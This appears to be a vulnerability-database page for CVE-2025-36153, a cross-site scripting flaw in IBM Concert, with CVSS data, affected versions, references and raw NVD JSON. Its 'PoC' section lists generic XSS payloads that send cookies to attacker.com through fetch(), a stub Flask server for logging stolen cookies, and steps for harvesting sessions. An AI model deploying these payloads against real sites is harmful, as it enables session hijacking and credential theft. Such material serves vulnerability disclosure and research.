CVE-2025-36153

Description

IBM Concert 1.0.0 through 2.0.0 is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:* - VULNERABLE

IBM Concert 1.0.0

IBM Concert 1.0.1

IBM Concert 1.0.2

IBM Concert 1.0.3

IBM Concert 1.0.4

IBM Concert 1.0.5

IBM Concert 1.0.6

IBM Concert 1.0.7

IBM Concert 1.0.8

IBM Concert 1.0.9

IBM Concert 1.0.10

IBM Concert 1.0.11

IBM Concert 1.0.12

IBM Concert 2.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-36153 PoC - Stored XSS in IBM Concert -->
<!-- This PoC demonstrates the XSS vulnerability in IBM Concert Web UI -->

<!-- Method 1: Direct XSS payload in input fields -->
<script>alert(document.cookie)</script>

<!-- Method 2: Image tag XSS -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Method 3: SVG XSS payload -->
<svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))>

<!-- Method 4: Event handler XSS -->
<body onload="fetch('https://attacker.com/log?session='+document.cookie)">

<!-- Attacker-controlled server endpoint example (Python) -->
# from flask import Flask, request
# app = Flask(__name__)
# @app.route('/steal')
# def steal():
#     cookie = request.args.get('cookie')
#     # Log stolen cookie
#     print(f"Stolen cookie: {cookie}")
#     return "OK"

<!-- Exploitation steps: -->
<!-- 1. Identify vulnerable input field in IBM Concert Web UI -->
<!-- 2. Inject XSS payload into the field -->
<!-- 3. Wait for admin/user to view the page -->
<!-- 4. Cookie/session is sent to attacker-controlled server -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36153
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36153
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36153/
[4] VulDB https://vuldb.com/cve/CVE-2025-36153
[5] https://www.ibm.com/support/pages/node/7252019

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36153", "sourceIdentifier": "[email protected]", "published": "2025-11-20T22:15:56.970", "lastModified": "2025-11-21T19:50:43.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Concert 1.0.0 through 2.0.0 is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "2.1.0", "matchCriteriaId": "43072AC2-05A5-41A3-9E79-E0AF2C5AD3FF"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7252019", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}